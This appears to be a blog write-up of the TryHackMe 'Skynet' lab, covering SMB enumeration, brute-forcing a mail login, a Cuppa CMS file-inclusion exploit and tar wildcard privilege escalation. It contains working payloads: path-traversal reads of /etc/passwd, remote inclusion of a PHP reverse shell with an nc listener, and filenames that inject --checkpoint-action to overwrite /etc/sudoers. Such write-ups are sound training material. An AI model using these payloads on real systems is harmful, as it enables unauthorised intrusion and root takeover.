Skynet – Tryhackme – Manual Writeup

Reading Time: ( Word Count: )

February 23, 2021
Nextdoorsec-course

Intro

Skynet machine covers the following topics:

  • Vulnerable smb server
  • Squirrelmail brute-forcing with Burpsuite
  • Local/Remote File Inclusion
  • Exploiting Wildcards on Linux

Enumeration

Nmap

Starting with a Nmap scan:

  ┌──(kali㉿kali)-[~]      └─$ nmap -v -A $IP
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA) | 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA) |_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Skynet 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: RESP-CODES PIPELINING TOP UIDL AUTH-RESP-CODE SASL CAPA 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: Pre-login OK LOGIN-REFERRALS IMAP4rev1 ID more ENABLE listed LOGINDISABLEDA0001 have IDLE post-login LITERAL+ SASL-IR capabilities 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We’ve discovered interesting open ports: pop3 server on port 110, IMAP mail server on port 143, open http server on its default port and a samba server that supports the SMB protocol. SMB has two ports, 445 and 139.

SMB originally ran on top of NetBIOS using port 139, but since NetBIOS is an older transport layer for Windows computers, port 445 took its place after Windows 2000. Now it runs on top of a TCP stack, which allows SMB to work over the internet.

Gobuster

The http web server doesn’t contain anything interesting, so let’s brute-force it for other directories:

  ┌──(kali㉿kali)-[~]      └─$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -r
=============================================================== http://10.10.176.19/admin (Status: 403) http://10.10.176.19/css (Status: 403) http://10.10.176.19/js (Status: 403) http://10.10.176.19/config (Status: 403) http://10.10.176.19/ai (Status: 403) http://10.10.176.19/squirrelmail (Status: 200) ===============================================================

We’ve discovered a login page for SquirrelMail but need credentials.

 

Samba

Let’s enumerate the samba server with Nmap scripts:

  ┌──(kali㉿kali)-[~]      └─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.176.19\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (skynet server (Samba, Ubuntu)) | Users: 2 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.176.19\anonymous: | Type: STYPE_DISKTREE | Comment: Skynet Anonymous Share | Users: 0 | Max Users: | Path: C:\srv\samba | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.176.19\milesdyson: | Type: STYPE_DISKTREE | Comment: Miles Dyson Personal Share | Users: 0 | Max Users: | Path: C:\home\milesdyson\share | Anonymous access: | Current user access: | \\10.10.176.19\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: |_ Current user access: | smb-enum-users: | SKYNET\milesdyson (RID: 1000) | Full name: | Description: |_ Flags: Normal user account

Anonymous access seems to be allowed; let’s also add the “milesdyson” user in our notes.

  ┌──(kali㉿kali)-[~]      └─$ smbclient //$IP/anonymous smb: \> cd logs smb: \logs\> ls . D 0 Wed Sep 18 06:42:16 2019 .. D 0 Thu Nov 26 17:04:00 2020 log2.txt N 0 Wed Sep 18 06:42:13 2019 log1.txt N 471 Wed Sep 18 06:41:59 2019 log3.txt N 0 Wed Sep 18 06:42:16 2019

One of the logs contains interesting passwords. Let’s save the file locally for later use.

Above, we found an smb share named milesdyson; let’s brute-force the mail server with this information.

Exploitation

Burpsuite

1. Capture request in Burpsuite
2. Send to Intruder (Ctrl+I)
3. Add password field in scope/position for brute-forcing
4. Choose attack type Sniper, load found passwords file & start the attack
5. Look for HTTP response codes that stand out from the rest

 

Now that we have the password, let’s login & check what else we can find:

There’s the password for our user’s share; we can use it to access his samba share:

  ┌──(kali㉿kali)-[~]      └─$ smbclient //$IP/milesdyson --user milesdyson
smb: \notes\> ls . D 0 Tue Sep 17 11:18:40 2019 .. D 0 Tue Sep 17 11:05:47 2019 3.01 Search.md N 65601 Tue Sep 17 11:01:29 2019 4.01 Agent-Based Models.md N 5683 Tue Sep 17 11:01:29 2019 2.08 In Practice.md N 7949 Tue Sep 17 11:01:29 2019 0.00 Cover.md N 3114 Tue Sep 17 11:01:29 2019 1.02 Linear Algebra.md N 70314 Tue Sep 17 11:01:29 2019 important.txt N 117 Tue Sep 17 11:18:39 2019 6.01 pandas.md N 9221 Tue Sep 17 11:01:29 2019 3.00 Artificial Intelligence.md N 33 Tue Sep 17 11:01:29 2019 2.01 Overview.md N 1165 Tue Sep 17 11:01:29 2019 ... prompt recurse mget *

 

Opening important.txt reveals a hidden directory:

  ┌──(kali㉿kali)-[~]      └─$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife

 

Let’s check out the CMS in this hidden directory:

Not much to see, but it probably has a login page since it’s a Content Management System (CMS); let’s brute-force for other directories.

  ┌──(kali㉿kali)-[~]      └─$ gobuster dir -u http://$IP/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -r
http://10.10.167.244/45kra24zxs28v3yd/administrator (Status: 200)

 

We’ve found the login page:

 

Checking out the source code, doesn’t reveal anything about the CMS version. Still searched in searchsploit for anything interesting:

  ┌──(kali㉿kali)-[~]      └─$ searchsploit cuppa
------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------ --------------------------------- Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt ------------------------------------------------------------------------------ ---------------------------------

It’s an RFI/LFI vulnerability, which means that we can include local or remote PHP (most often) files or read non-PHP files with this vulnerability. In LFI, the attacker has to upload the malicious script to the target server to be executed locally.

  ┌──(kali㉿kali)-[~]      └─$ http://10.10.167.244/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin ...

 

Now let’s use it to get a reverse shell. First, we’ll need to start a listener, then the local http server and afterwards call the PHP script from there:

  ┌──(kali㉿kali)-[~]      └─$ sudo nc -nlvp 443
  ┌──(kali㉿kali)-[~]      └─$ python3 -m http.server 5300
  ┌──(kali㉿kali)-[~]      └─$ http://10.10.167.244/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.152.221:5300/revsh.php

If you’re using Kali Linux, you should have a reverse PHP script available locally in the following folder:
/usr/share/webshells/php/php-reverse-shell.php. Copy it and change the IP address & port number to connect back to.

listening on [any] 443 ... connect to [10.8.152.221] from (UNKNOWN) [10.10.167.244] 38510 Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 10:46:22 up 38 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data

Now that we’ve got the user flag. Let’s escalate privileges!

Privilege Escalation

Exploiting Wildcard

I didn’t find any SUID bit enabled binaries. I tried to view the etc/shadow file with no success. After some more enumeration, I’ve found out an unusual cronjob, which runs every minute:

  ┌──(kali㉿kali)-[~]      └─$ cat /etc/crontab
# /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command */1 * * * * root /home/milesdyson/backups/backup.sh 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) #

 

Let’s inspect it:

$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz *

/bin/bash gets a shell as root as seen in etc/crontab, then navigates to the /var/www/html directory and creates a backup/archive of everything in the directory using tar.

At the end of the tar command, the asterisk is known as a wildcard, meaning “all”. The asterisk can be used for various purposes such as ls *.py meaning, list all files with the .py extension. Anything we put in /var/www/html will be added to the compressed file generated by tar.

There’re several ways to exploit this, let’s go with the easiest one. We’ll add ourselves to the etc/sudoers file and this way we’ll be able to execute any command with sudo, such as sudo bash to get a root shell. Shown in a simple command, this is the following we’re trying to achieve:

  ┌──(kali㉿kali)-[~]      └─$ echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers

 

Let’s better understand the following two commands that will be used for privilege escalation by checking out tar’s manual page:

  ┌──(kali㉿kali)-[~]      └─$ man tar
Informative output --checkpoint[=N] Display progress messages every Nth record (default 10). --checkpoint-action=ACTION Run ACTION on each checkpoint.

The wildcard means that we can do a simple argument injection by writing the arguments we need as filenames and use checkpoint actions to execute commands.

$ cd var/www/html
$ echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > root.sh
$ echo "var/www/html" > "--checkpoint-action=exec=sh root.sh"
$ echo "var/www/html" > --checkpoint=1
$ sudo bash whoami root

When enclosed in single quotation marks ('), no character in the single quote has special meaning. Whereas double quotes (") allow the shell to interpret dollar sign ($), backtick(`), backslash(\) and exclamation mark(!).

Aydan Arabadzha

Aydan Arabadzha

Author

Aydan, a cybersecurity ace and AI visionary, thrives on the frontlines of offensive security. His passion birthed NextdoorSec, a groundbreaking cybersecurity firm. A relentless pioneer, Aydan is persistently pushing boundaries, shaping the future of the digital world one byte at a time.

Other interesting articles

Top Security Practices to Protect Your Data in Cloud Services

Top Security Practices to Protect Your Data in Cloud Services

Cloud services make storing and accessing your data simple and flexible, but they also bring new security ...
Boosting Efficiency With Law Firm IT Solutions: A Guide for Small Practices

Boosting Efficiency With Law Firm IT Solutions: A Guide for Small Practices

Small law firms often juggle multiple responsibilities with limited resources, making efficiency a top priority. ...
Automated vs Manual Penetration Testing

Automated vs Manual Penetration Testing

Pentesting is largely divided into two methodologies: Automated vs Manual Penetration Testing. Both have ...
0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *